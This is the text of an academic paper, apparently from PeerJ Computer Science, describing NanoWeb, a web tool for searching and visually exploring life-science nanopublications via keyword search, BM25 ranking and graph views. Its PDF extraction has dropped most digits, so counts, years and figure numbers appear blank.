the nanopublication is composed of four parts: (i) the head that acts as a connector between the other three sub-graphs; (ii) the assertion graph (blue) expressing the relationship between the two concepts of the assertion (the gene-disease association), the relationship of the concepts with external ontologies (the fact that activin a receptor type a is a gene and colorectal cancer is a disease), and possibly a link towards the scientific database storing related data; (iii) the provenance graph (orange) containing metadata about the assertion such as the methods used to generate the assertion and its creators; and (iv) the publication info graph (yellow) containing the metadata about the evidence paper from which the assertion was extracted and about the nanopublication itself. in fig. b, we can see a graphical representation of the four parts of the nanopublications with a human-readable representation of the gene-disease association encoded by the assertion graph. a key aspect motivating the use of nanopublications is the possibility to exploit lod features, allowing for exploring relation networks created by connecting related facts giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.w .org/tr/trig/ https://www.w .org/tr/trig/ http://rdf.disgenet.org/ https://github.com/maastrichtu-ids/semanticscience https://github.com/maastrichtu-ids/semanticscience https://www.ncbi.nlm.nih.gov/ https://www.ncbi.nlm.nih.gov/ http://linkedlifedata.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ encoded in rdf. indeed, nanopublications create a network of scientific assertions that can be explored to discover connections between facts. in the literature, there is important evidence of using nanopublications as a credible approach for expanding scientific insight, especially in the biomedical domain (chichester et al., ). as a motivating example, fig. c shows a small network of gene-disease associations. we can see that the genes activin a receptor type a and xrcc p are both related to colorectal cancer. if we search for other connections, we find another nanopublication relating the xrcc p gene to the malignant neoplasm of breast disease. further expanding the relation network, we see that there exist two other nanopublications connecting the abca gene with both colorectal cancer and malignant neoplasm of breast. fig. c presents a small network that shows the relationships between facts extracted from five different papers published in different venues at different times that do not cite each other. this is just a hint about how exploring figure (a) rdf (trig) representation of the nanopublication encoding the assertion: (activin a receptor type a—gene—disease association—colorectal cancer); (b) graphical representation of the four parts of the nanopublications with a human-readable representation of the assertion graph; (c) network of gene-disease associations created by five nanopublications. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the nanopublication relation network could lead to finding related concepts and assertions that might not be explicitly connected in the scientific literature and databases. nonetheless, despite these premises, nanopublications are not widely used by scientists outside specific circles (page, ); they are hard to find and rarely cited. 
nanopublications rarely have a human-readable accessible version and cannot be searched via keywords or natural language queries. although nanopublications are based on lod principles, there are still no tools that allow the user to explore their connections intuitively and discover if and how one assertion is related to others, as we have done in the example above. leveraging on the famous data is the new oil metaphor (the economist, ), we can say that with nanopublications we have a vast oil reservoir but no active refinery, distribution net and machines to put it into use. in this work, we target these issues and present the nanoweb application (https://w id. org/nanoweb/), an open-source and publicly available web service enabling intuitive search, exploration, and re-use of nanopublications. the current version of nanoweb is tailored for the life science domain, and it is designed to help experts of this domain in their research work. nanoweb is an extensible tool to be applied to other scientific domains, even though certain customization to do so will be required. nanoweb is a single entry point to the world of nanopublications enabling the seamless integration of data search, exploration, and re-use services; its central features are: . a crawler gathering publicly available nanopublications from the web; . two intuitive search functionalities, based respectively on the keyword search and boolean search paradigms; . a user-oriented visual interface to consult the nanopublications enriched with information gathered from external authoritative ontologies; . a service enabling the graph-based visualization of assertions and the exploration of their relation network; . data search functionalities providing entry points to external curated databases storing the scientific facts encoded by the nanopublications as well as to the scientific papers where the assertions were extracted. the rest of the article is organized as follows: “background” presents the background of the nanopublication model and the state of the art of systems based on it. “the nanoweb architecture” describes the overall architecture of the nanoweb application. “nanopublication collection statistics” reports the statistics about the nanopublications available in nanoweb. “nanoweb graphical user interface” shows how nanoweb works and details the functioning of the user interface. “expert users survey” reports the results of the expert users survey conducted on nanoweb. “discussion on maintaining aspects” discusses the challenges to be faced with maintaining nanoweb in the medium-long period and how it can scale up to be used in domain others than life science. finally, “conclusions” draws some final remarks and outlines future work. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://w id.org/nanoweb/ https://w id.org/nanoweb/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ background basics of nanopublications nanopublications rely on semantic web technology. in particular, they are modeled via rdf (groth, gibson & velterop, ), a widely used standard endorsed by the w c consortium (https://www.w .org/tr/rdf -primer), adopted for data publishing, accessing and sharing. rdf allows for the manipulation, enrichment, discovery and interoperability of data and it is at the core of the implementation of the lod paradigm (pound, mika & zaragoza, ). rdf is based on the concept of statement, that presents a <subject, predicate, object> triple-based structure. 
within a triple, subject, predicate and object are resources. in particular, an rdf dataset can be represented as a graph where, given a triple, the subject and the object are the nodes representing resources, while the predicate, the direct edge connecting the two, expresses their relationship. rdf resources can either be internationalized resource identifiers (iris), literals or blank nodes. an iri (https://tools.ietf.org/html/rfc ) is a more general form of uri which can also contain unicode characters. a literal is a value which can be associated to a specific type of value, such as string, integer, date, time etc. the default value is string. blank nodes are resources which are labeled with a uri-like string which has validity only inside the database. in rdf every resource and relationship is labeled. subject and object nodes can be labeled with iris, object nodes can also be labeled with literals. relationships can only be labeled with iris. blank nodes can be subject or object of a triple. a set of rdf triples can also be thought as a directed graph, where subjects and objects are nodes and predicates are the directed edges. hence, it is also called rdf graph. in recent years it has been proposed the idea to extend the basic semantic of rdf by using quads instead of triples, where an identifier (an iri) is added. in this way, groups of triples may be characterized as belonging to the same subgraph, that is, to the same named graph (carroll & stickler, ; carroll et al., ), if they share the same extra uri. every nanopublication is made of four basic named graphs as shown in figure .a: . head: the graph composed of four triples connecting assertion, provenance and publication info graphs together and specifying that the graph at hand is a nanopublication. . assertion: the assertion is to be thought of as the minimal unit of thought, a fact or a statement. it can be composed of one or more rdf triples and for this reason, we often call it assertion graph. . provenance: the named graph made of metadata providing context about the assertion. the information contained in the provenance describes how the information expressed in the assertion was created (from some experiment, extrapolate from a paper or article, etc.) and the methods that were used to generate the assertion. it includes information such as authors, institutions, time-stamps, grants, links to evidence papers and other resources. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.w .org/tr/rdf -primer https://tools.ietf.org/html/rfc http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . publication information: the graph containing the information about the nanopublication itself, such as its authors, the topic of the assertion, and rights information. nanopublication resources and datasets the website http://nanopub.org/ is the most comprehensive access point to the world of nanopublications. it collects papers and tools about nanopublications. the central resource to access millions of publicly available nanopublications is the “nanomonitor” (http://app. tkuhn.eculture.labs.vu.nl/nanopub-monitor/). it provides a list of sixteen worldwide distributed servers where nanopublications can be openly accessed and downloaded in several formats. the nanopublications are ordered by identifier, but no full-text or structured search service is available. the nanopublications are accessible in an rdf serialization format. thus they are machine-readable but not human-readable (see fig. a). 
kuhn et al. ( ) describes a web-based service (i.e., nanobrowser) enabling access to human-readable enriched scientific statements extracted from nanopublications. the aim of nanobrowser is to enable easy publishing and curation of nanopublications, but unfortunately, at the time of writing, it does not work, even though the source code is publicly available (https://github.com/tkuhn/nanobrowser). the nanobrowser had the goal to ease the extraction of facts from scientific papers and to enable the community to curate and revise the statements; its overall objective is different from those of nanoweb even though they share the requirement of making nanopublications human-readable and facilitate access to them. in the same direction, the whyis project (http://tetherless-world. github.io/whyis/) proposes a knowledge graph infrastructure to support domain-aware management and curation of knowledge from different sources; it leverages on the nanopublication model to represent the facts and handle their provenance in the knowledge base. whyis also offers some facilities to allow the users to visually explore the knowledge graph beyond a given entity by using the so-called knowledge explorer (mccusker et al., ; mccusker et al., ); the knowledge explorer shares some similarities with the nanoweb exploration tool. in particular, they both allow the exploration of the connections between entities in the knowledge graph. nevertheless, whyis does not visualize the scientific assertions encoded by nanopublications. more specifically, the whyis project is oriented to the creation and user-based curation of the nanopublications rather than to the search and exploration possibilities connected to them. hence, nanoweb is a complementary service rather than a competitor to whyis. mons et al. ( ) advocated for the systematic use of nanopublications to encode scientific facts reported in published papers. they see nanopublications as the key tool to enable reasoning and fact discovery exploiting machine intelligence. furthermore, they extracted thousands of nanopublications about valuable and hard to discover gene variations and made them publicly available. we enable the search and access to these nanopublications in nanoweb. chichester et al. ( ) described how they created nanopublications encoding scientific facts associated with more than k proteins stored in the nextprot giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://nanopub.org/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ https://github.com/tkuhn/nanobrowser http://tetherless-world.github.io/whyis/ http://tetherless-world.github.io/whyis/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ database (https://www.nextprot.org/). the main motivation for this work is to exploit nanopublications potential to support end-user research on human proteins enabling machine-reasoning, easy search and access to the protein-related facts. chichester et al. ( ) showed how nanopublications as fine-grained annotations answer to complex knowledge discovery queries otherwise challenging to deal with. also, in this case, queries are performed using the sparql structured language confining the use of nanopublications to technical database experts. we crawled and enable keyword-based search over all the publicly available nextprot nanopublications. queralt-rosinach et al. 
( ) described the process that led to the publication of millions of nanopublications about the pathophysiology of diseases extracted from the scientific literature and backed by curated records in the disgenet database (http://rdf. disgenet.org/). the disgenet nanopublications are publicly available and accessible via a sparql endpoint. nanoweb collected, indexed all the available disgenet nanopublications and made them searchable and human-readable. each nanopublication is enriched with a url linking to the related curated record in disgenet. wikipathways is an online collaborative pathway resource that is made available as rdf and nanopublications (waagmeester et al., ). the nanopublications are backed by the wikipathways curated database and are accessible via a sparql endpoint (not available at the time of writing). the resource to convert the rdf triples of wikipathways to nanopublication is publicly available (https://github.com/wikipathways/ nanopublications). we crawled all the wikipathways nanopublications, that are now searchable and accessible via nanoweb. hettne et al. ( ) extracted more than m assertions about gene-disease associations from the biomedical literature. m assertions are explicitly stated in the scientific papers and the rest is implicitly inferred. there is a publicly available dump (https://datadryad.org/stash/dataset/doi: . /dryad.gn ) of the nanopublications shared as additional data for the article. the research group (https://biosemantics. erasmusmc.nl/) was responsible for the website “https://rdf.biosemantics.org/” (now inactive) sharing all the nanopublications and the ontology required to dereference the concepts encoding the assertions. unfortunately, at the time of writing, the nanopublications as well as the sparql endpoints to access them are unavailable. amith & tao ( ) defined an ontology—vaxmo—for encoding vaccines-related information extracted from scientific literature and used nanopublications to propose a method to store misconceptions about vaccines. unfortunately, the vaxmo ontology is not accessible as well as the associated nanopublications. also, zhang et al. ( ) recently used the nanopublication model to represent scientific facts manually extracted from the literature about cancer behavioral risk factors. they presented a prototype— aero—to search and visualize the nanopublications; search is based on sparql queries and the visualization is allowed only for the results returned by the sparql endpoint. at the time of writing, aero is not publicly available. to the best of our knowledge, there is no available tool to visualize nanopublications and explore their connections. the tool which is closer to nanoweb in terms of semantic search and graph visualization is biokb (biryukov et al., ). biokb provides access giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.nextprot.org/ http://rdf.disgenet.org/ http://rdf.disgenet.org/ https://github.com/wikipathways/nanopublications https://github.com/wikipathways/nanopublications https://datadryad.org/stash/dataset/doi: . /dryad.gn https://biosemantics.erasmusmc.nl/ https://biosemantics.erasmusmc.nl/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to the semantic content of biomedical articles through a sparql endpoint and a web interface; its goal is to allow the users to search for biomedical entities and visualize their graph of relations. 
however, biokb does not account for nanopublications and does not support a multi-level exploration of the graph, enabling an in-depth exploration of the entities relation network. overall, the current services for searching nanopublications are all based on sparse sparql endpoints. to this end, nanoweb contributes on two levels. first, it provides a unique online access point to all the publicly available nanopublications from the life science domain; and, second, nanoweb provides advanced services such as keyword search, visualization and human-readable access to millions of nanopublications, making them accessible to users without technical expertise in sparql and related technologies. search over rdf rdf graphs can be interrogated through the powerful but complex sparql query language (pérez, arenas & gutierrez, ). sparql is not intuitive for end-users since it presents a complex syntax, far from a natural expression of their information need (wu, ). it also requires knowledge of the underlying schema of the database, and of the iris used in it. this knowledge is often not possessed by the average end-user. a search paradigm adopted to address the issues related to the use of sparql is keyword search. keyword-based methods have gained importance over time both in research and in industry as a paradigm to facilitate the access to structured data (bast, buchhold & haussmann, ; kopliku, pinel-sauvagnat & boughanem, ; yu, qin & chang, ). the main difference between sparql and keyword search is that, while sparql returns the one and only correct answer (or an empty set if there was no answer), keyword search returns a ranking of answers, ordered based on their relevance to the information need expressed by the user via the keyword query. in the literature, keyword query search systems over structured data are mainly focused on relational databases (rdb) (yu, qin & chang, ) but many are also emerging for graph-like databases such as rdf datasets (wang & aggarwal, ; bast, buchhold & haussmann, ). these systems may be divided into three categories. the first kind of systems is schema-based. examples are (balmin et al., ; agrawal, chaudhuri & das, ; luo et al., ). these systems exploit the schema information of the database, be it relational or rdf, to formulate queries in a structured language (sql or sparql depending on the type of the database) designed from the keyword query of the user. the second category is graph-based. originally born with relational databases (bhalotia et al., ; simitsis, koutrika & ioannidis, ), the technique at the base of these systems was based on the transformation of the relational database in a graph. these systems are relatively easily translated in the rdf scenario since these databases are already in a graph form. a core challenge of these systems is to deal with the size of big graphs, which can contain tens of millions of nodes, if not more. in several cases, it has been shown that the size makes the task unsolvable by these systems (coffman & weaver, ). giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ stemming from this last class of systems, the last category is the one of the virtual- document based systems kadilierakis et al. ( ). first described in lopez-veyna, sosa & lópez-arévalo ( ), this approach relies on the concept of virtual document of a graph. 
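to make concrete why sparql is a barrier for non-expert users, as discussed at the beginning of this section, the following hypothetical example contrasts a structured query with the keyword query a user would rather type. it uses the sparqlwrapper python package; the endpoint url, prefixes, and predicates are placeholders, not the schema of any actual nanopublication dataset.

```python
# Hedged illustration (not NanoWeb code): the same information need expressed as a
# SPARQL query versus a keyword query. Endpoint URL and schema are hypothetical.
from SPARQLWrapper import SPARQLWrapper, JSON

endpoint = SPARQLWrapper("http://example.org/sparql")  # hypothetical endpoint
endpoint.setQuery("""
    PREFIX ex: <http://example.org/>
    SELECT ?assertion ?disease
    WHERE {
      GRAPH ?assertion {            # the user must know that assertions live in named graphs
        ?gene ex:associatedWith ?disease .
        ?gene ex:label "MLH1" .     # and which predicates and labels the dataset uses
      }
    }
""")
endpoint.setReturnFormat(JSON)
results = endpoint.query().convert()

# the keyword-search alternative hides all of the above behind a ranked list:
keyword_query = "MLH1 colorectal cancer"
```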
given one graph, rdf or obtained by relational tuples, its corresponding virtual document is obtained by extracting words from it in an automatic way. this produces a “flat” representation of the graph, where its syntax and topology are lost but its semantic and lexical content is somewhat maintained. the virtual document representation is convenient since systems can leverage on efficient state-of-the-art ir methods for indexing and ranking. these methods operate by first extracting subgraphs from the whole database, then converting them in their virtual document representation and ranking these documents with respect to the keyword query. the user receives at the end the ranking of graphs in the order dictated by the ranking on the corresponding documents. there is no keyword search system for nanopublications, which are always searched via sparql endpoints. the complexity of search systems for rdf and their scalability issues have prevented the use of keyword search for rdf data in general and nanopublications in particular. nanoweb, exploits a very recent advancement in virtual-document based systems (dosso & silvello, ), which enable fast and effective keyword search over rdf and nanopublications. the nanoweb architecture the nanoweb architecture is composed of four main components: (i) a crawler that gathers nanopublications from the web; (ii) a search system that indexes and enables full- text search over the nanopublications; (iii) a nanopublication citation system; (iv) a web user interface to search, access and explore the nanopublications and their relation network. figure shows the architecture of the nanoweb system, which consists of the following areas: � data creation and update (fig. a): —crawler ( ): it collects nanopublications from different web sources. it considers different types of resources: authoritative ones, such as academic or institutional platforms; and public ones, such as git repositories. nanopublications are downloaded and stored in an rdf database ( ). the crawler also downloads new nanopublications obtained from urls that can be provided by the users; this process is handled by the business logic unit ( ). the crawler sends a new request for each web source in the list of initial seeds. it parses and scrapes the web pages and produces a list of extracted urls. each url in the list is processed so that direct links to nanopublications are resolved and added to the download queue. each nanopublication file is downloaded using an independent thread so that requests are handled asynchronously. these files are saved into the rdf database. the links in the url list that point to other web pages are followed so that these new web pages are also parsed and scraped in a recursive scraping loop to discover new nanopublications. the crawler is written in java and it comes with a graphical and a batch mode. the graphical mode allows the user to interact and control crawler giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ activities using a graphic user interface (gui). the batch mode enables a fast and batch-based download using operating systems lacking a gui. —metadata builder ( ): the nanopublications are processed to dereference the urls and to get additional metadata; for instance, the nanopublications are enriched with the label of the concepts referring to external ontologies, the names of creators and curators and the title of the evidence papers. 
these data are saved in a relational database ( ). —document builder ( ): the document creation phase occurs after the dereferencing and enrichment phase. the document builder creates “virtual” nanopublication documents, which are saved into a database ( ), on which the keyword search system is based. � search system (fig. b): this system performs keyword search on the nanopublications and it has three components: —business logic ( ): it is the controller unit of the search system. it performs the orchestration activities such as the coordination of the crawler by feeding it with new nanopublication urls. it takes the user keyword query as input and returns the relevant nanopublications through the web interface as output. to perform this task, the business logic unit relies on three databases: the nanopublication documents database ( ), the fields ( ) and the indexes ( ). the indexes database contains the inverted index extracted from the nanopublication documents required to match the query terms with the document terms. the fields database is required to provide fast access to specific nanopublication data such as the authors, curators, and evidence paper metadata. —web interface ( ): it is the front-end allowing the user to search, access, explore and cite nanopublications through an interactive interface. it communicates with the business logic unit using a rest layer that provides public api for accessing nanopublications data in json format. —log system ( ): it deals with the logging tasks of the search system and it relies on a specific relational database ( ). it communicates with the web interface to collect relevant user activity information and possible problems. � citation system ( ): it generates the citations text snippet for the nanopublications of interest to the user by relying on the system presented by fabris, kuhn & silvello ( ). citations are a fundamental tool to give credit to authors and curators of data and publications and help other users to recognize the value of nanopublications. when the business logic unit ( ) receives the request to produce a citation for a nanopublication, it sends this request to the citation system, that in turn collects the necessary metadata from the corresponding database ( ). once produced, the citation snippet is returned to the business logic unit and then visualized in the web interface. search system let us assume that a user has an information need, and wants to retrieve the nanopublications that satisfy it. since nanopublications are encoded in rdf, one a demonstration video of the crawler in action, using the graphic mode, is avail- able at https://bit.ly/ rvlgzl. all the relational databases are based on postgresql version . allowing for the table partitioning function; this function enables efficient storage and access to the data. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://bit.ly/ rvlgzl http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ possibility is to query the graph composed by all the nanopublications via the sparql query language, that, as already discusses, presents drawbacks for non-expert users. we adopt two alternatives to sparql, that is, keyword search and boolean search, both oriented to ease the search process for the users. boolean search (i.e., advanced search) is adopted for domain-specific searches and it is useful to guide users in query formulation, since they often do not know in advance what they can search. 
we realized advanced search over the nanopublication metadata database, that allows for searching on specific fields of the indexed data (e.g., genes, diseases, proteins or authors). boolean search enables targeted search functionalities, but it does not allow for general and open full-text search over the nanopublications. to allow users to exploit natural language to search for nanopublications, we realized a keyword search system over rdf data. the system we adopt is based on the virtual document strategy, first presented in lopez- veyna, sosa & lópez-arévalo ( ) and used in many other papers about keyword search on rdf graphs (dosso & silvello, ; elbassuoni & blanco, ; mass & sagiv, ). the underlying task of these papers is that, given an rdf graph, the user wants to query it, but for some reason, she is unable to use a sparql query. keyword search is an alternative paradigm to using a structured query based on a query made of keywords. figure nanoweb system architecture. (a) data creation and update area; (b) search system; (c) supporting databases. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the virtual document strategy is one of the many strategies deployed to face keyword search on rdf graphs. given an rdf graph, we call its corresponding virtual document the textual document obtained from the concatenation of words obtained from the iris and literals contained in the nodes and edges of the graph. given a collection of graphs it is therefore possible to create a corresponding collection of virtual documents. every document is uniquely linked to the graph that generated it since they share the same identifier. then, the collection of documents is indexed and, from that moment on, this index can be used to answer keyword queries in the same way in which it is done in more classic ir scenarios, where the collections are made by “real” documents. in this paper we used a probabilistic model (i.e., bm (robertson et al., )) as ranking function. every time a new query is issued, bm uses the virtual document index to create a ranking of documents. the document identifiers are used to retrieve the corresponding graphs, that is, the corresponding nanopublications, from the collection. this list of nanopublications is then returned to the final user in the same order dictated by the ranking. one may argue that this strategy discards information from the graphs. since each graph is flattened to a document version of itself, information such as its topology and the disposition of words among nodes and edges is lost. this is certainly true, and in fact works such as (dosso & silvello, ; elbassuoni & blanco, ; mass & sagiv, ) do not limit themselves to virtual documents, but employ different kinds of heuristics to better leverage on the topology of the graphs. moreover, topology oriented heuristics often rely on the exploration of the graphs, which adds overhead to the whole computation. the more the answers returned by bm , the bigger this overhead. therefore, we argue that the use of topology-oriented heuristics do not guarantee a significant improvement on the effectiveness of the rankings obtained by the graphs with respect to the added overhead to the computation. nanopublication collection statistics in table we report the number of nanopublications per scientific platform currently available in nanoweb. 
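before turning to the collection statistics, the following sketch illustrates the virtual-document idea and the bm25 ranking described in the previous paragraphs. it uses rdflib and the rank_bm25 package purely for illustration and is not the actual nanoweb indexing pipeline, which relies on the system of dosso & silvello; tokenization and data structures are simplified assumptions.

```python
# Rough sketch (assumptions: rdflib and rank_bm25; not NanoWeb's indexing code).
# Each graph is flattened into a "virtual document" made of words taken from its
# IRIs and literals; BM25 then ranks the documents for a keyword query.
import re
from rdflib import Graph
from rank_bm25 import BM25Okapi

def virtual_document(g: Graph) -> list[str]:
    """Flatten an RDF graph into a bag of lowercase tokens."""
    tokens = []
    for s, p, o in g:
        for term in (s, p, o):
            # split IRIs and literals on non-alphanumeric characters
            tokens += [t.lower() for t in re.split(r"\W+", str(term)) if t]
    return tokens

def rank(graphs: dict, query: str, k: int = 10):
    """graphs: a hypothetical dict {nanopub_id: rdflib.Graph}. Returns the top-k ids."""
    ids = list(graphs)
    corpus = [virtual_document(graphs[i]) for i in ids]
    bm25 = BM25Okapi(corpus)
    scores = bm25.get_scores(query.lower().split())
    return sorted(zip(ids, scores), key=lambda x: -x[1])[:k]
```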
currently, we have crawled and indexed nanopublications from the following platforms:

- disgenet (https://www.disgenet.org/): "a discovery platform containing one of the largest publicly available collections of genes and variants associated to human diseases" (piñero et al., ). disgenet is a knowledge management platform integrating and standardizing data about disease-associated genes and variants from multiple sources, including the scientific literature. disgenet covers the full spectrum of human diseases as well as normal and abnormal traits. queralt-rosinach et al. ( ) presented the publication of disgenet human gene-disease associations (gdas) as a new linked dataset exploiting the nanopublication approach. disgenet provides roughly half of the nanopublications, about million, available in nanoweb.

- nextprot (https://www.nextprot.org/): "nextprot is a protein knowledge platform that aims to support end-user research on human proteins" (chichester et al., ). chichester et al. ( ) converted data from nextprot into nanopublications to show how they can be used to seamlessly query the data and gain biological insight. in particular, they converted three types of annotations of interest for the biomedical community: variation data, post-translational modification (ptm), and tissue expression.

- protein atlas (https://www.proteinatlas.org/): "a human pathology atlas has been created as part of the human protein atlas program to explore the prognostic role of each protein-coding gene in each cancer type by means of transcriptomics and antibody-based profiling" (uhlen et al., ). the human protein atlas is an open-access knowledge base providing the data to allow genome-wide exploration of the impact of individual proteins on clinical outcomes. the human protein atlas (hpa) programme aims to "generate a comprehensive atlas of protein expression patterns in human normal and cancer tissues as well as cell lines" (pontén, jirström & uhlen, ).

- wikipathways (https://www.wikipathways.org/): "wikipathways is an open, collaborative platform dedicated to the curation of biological pathways" (slenter et al., ; waagmeester et al., ). wikipathways provides rich pathway databases with a focus on genes, proteins and metabolites. the data from wikipathways have been converted into a dataset of nanopublications as explained in kuhn et al. ( ).

table : number of nanopublications per platform (disgenet, nextprot, protein atlas, wikipathways) and the overall total.

association analysis

disgenet accounts for roughly half the total number of nanopublications in nanoweb. the assertions encoded by these nanopublications are divided into gene-disease associations of different types. in fig. , we report the number of assertions in nanoweb for each association type of the disgenet ontology. a detailed description of the associations is available on the disgenet website (https://www.disgenet.org/dbinfo#section ). in the same vein, table reports the gene-tissue association types present in nextprot nanopublications. in particular, the protein-coding gene expression in tissue association describes the role of a protein-coding gene in directing the production of proteins expressed in a given tissue.
another type of association regarding proteins is protein expression in tissue, which describes the expression level (high, low, medium, not detected) of a protein in a tissue. in addition, the sequence on amino-acid association describes the relationship between proteins and amino acids. the total number of nanopublication assertions regarding protein associations is over million.

scientific evidences

nanopublication assertions are supported by evidences; an evidence can be a scientific publication, a curated database record, or both. the nanopublication evidences in nanoweb come from several institutional open-access databases such as bgee (https://bgee.org/), cancer sanger (https://cancer.sanger.ac.uk/), ebiquickgo (https://www.ebi.ac.uk/quickgo/), gene expression omnibus (geo) (https://www.ncbi.nlm.nih.gov/geo/), protein atlas (https://www.proteinatlas.org/) and uniprot (https://www.uniprot.org/). we report the evidence databases associated with the nanopublications available in nanoweb in table . the total number of evidences collected from authoritative databases is about million, and the evidences coming from publications are more than million. all these publications are available in the pubmed (https://pubmed.ncbi.nlm.nih.gov/) database.

figure : disgenet ontology: number of assertions (yellow) for each disgenet association type; the gene-disease association subtypes include therapeutic, biomarker, chromosomal rearrangement, susceptibility mutation, genomic alterations, genetic variation, causal mutation (somatic and germline), altered expression, post-translational modification, fusion gene, and modifying mutation (somatic and germline).

nanoweb graphical user interface

the nanoweb system, available at http://w id.org/nanoweb/, provides an interactive web interface that the user can use to search, access, explore, and cite nanopublications. a demo video presenting nanoweb functionalities is available at https://bit.ly/nwurl .

figure shows the nanoweb search interface. at the top of the page, there is the query input form ( ), where the user types the query and searches for nanopublications. on the right side of the query input form, there is a button ( ) to pin or unpin it. the query input form is unpinned by default; this means that it floats at the top of the page so that it is always visible to the user even when the page is scrolled. the user can press the button to pin the query input form, making it hidden when the page is scrolled. on the left side of the query input form, there is the menu button ( ). by clicking on it, the sidebar appears with a list of links to the web app functionalities:
1. home: takes the user to the home page.
2. stats: takes the user to the web page summarizing the nanoweb system statistics, such as the number of nanopublications and triples inserted in the database.
3. about: takes the user to the page that briefly describes the purpose of the nanoweb system and summarizes the provided functionalities.
4. contacts: leads to a page with contact information of the authors of this project.

table : assertion numbers for the association types "protein-coding gene expression in tissue" (generic; with quality high, low, medium, negative, not detected, positive; and the total), "protein expression in tissue" (with level high, low, medium, not detected; and the total), "sequence on amino-acid", and the total number of protein associations.

table : number of evidences per database (bgee, cancer sanger, ebiquickgo, gene expression omnibus (geo), protein atlas, uniprot) and the total number of evidences.

the body of the web interface consists of three layers displayed alternatively:

- nanopublications list (fig. a): a list of nanopublications retrieved for the user query. each nanopublication is represented with a row in the list, reporting the following information: the title of the nanopublication ( a); the assertion of the nanopublication ( b); a link to the source platform of the data ( c), for instance, in fig. the source platform of the data is disgenet; and the graph button to display the graph associated with the nanopublication ( d). when the user clicks this button, the graph layer appears and shows the nanopublication graph on the right side of the nanopublications list; if the information layer is displayed, it is replaced with the graph layer. the load more button (fig. . ) loads more relevant nanopublications associated with the query, if any. as we can see in fig. , when a user clicks on a specific row, the information layer is displayed, showing the information regarding the selected nanopublication.

- the information layer shows the information associated with the selected nanopublication, including: assertion (fig. . ): this section reports the assertion of the nanopublication of interest and its title; in addition, meaningful entities, such as the disease colorectal carcinoma, are reported as links to external knowledge bases. publication info (fig. . ): this section reports the publication information of the clicked nanopublication, including the creation date, the creators, and the source platform; moreover, a link to the data record is provided so that the user can be redirected to the data record about the assertion, and these links act as entry points to external scientific databases. for instance, fig.
shows the data record web page for the nanopublication with title: mutl homolog —colorectal carcinoma in disgenet. . provenance: (fig. . ) this section shows the provenance information such as the evidence source and how the nanopublication was generated. it also reports the abstract of the publication, if present. . cite: (fig. . ) this section shows the citation snippet of the nanopublication. the user can copy the citation text by clicking on the cite this nanopub button in the header. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the user can expand/collapse each section by clicking on the title or in the header section. � graph layer: fig. shows the graph layer displayed on the right side of the nanopublications list after the user click. this layer shows the graph associated with the nanopublication, leveraging on the rdf triple structure. each graph node corresponds to the subject or the object of an assertion, while the edge represents the predicate. each assertion is represented with a directed edge. the figure shows the graph associated with the mutl homolog —colorectal carcinoma nanopublication. the assertion within this nanopublication has two nodes: mutl homolog as the subject and colorectal carcinoma as the object. the subject—a gene—is colored in green, while the object—a disease—is in red. the predicate connecting the two is represented as an oriented grey edge. there are different ways to interact with the nanopublication graph. for instance, the user can click on a node to expand the relation network and visualize other nodes connected to the nanopublication of interest. the complete list of the user graphic controls available can be consulted by clicking on the controls help button indicated with number three in fig. . the figure shows a two-levels expansion starting from the subject node mutl homolog and ending with the expansion of the node associated to the colorectal cancer disease. the possible actions that a user can perform on the graph are: —expand/collapse graph network: when the user left-clicks on an unexpanded node, the graph is expanded. thus its relation network is shown. otherwise, if the user clicks on an already expanded node, the graph collapses, and in turn, its relation network is hidden. —show node information: when the user right-clicks on a node, a dialog modal window appears to show the information concerning that node. for instance, the information window shows the type of entity node clicked, such as gene or disease in case of nodes coming from nanopublications concerning biological or medical fields. —show edge information: when the user left-clicks on edge, a dialog modal window appears to show the information regarding the nanopublication. figure shows that when the edge connecting muts homolog and carcinogenesis is clicked, the nanopublication information window appears on the right side. the modal dialog window contains the same information of the information layer. still, it has a smaller width and can be dragged anywhere inside the graph layer, so it is always accessible without covering it. —drag and drop: the user can drag and move the nanopublication graph by pressing the mouse’s left button and moving it around the graph layer. when the desired position has been chosen, the user can release the left button of the mouse to drop the graph. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
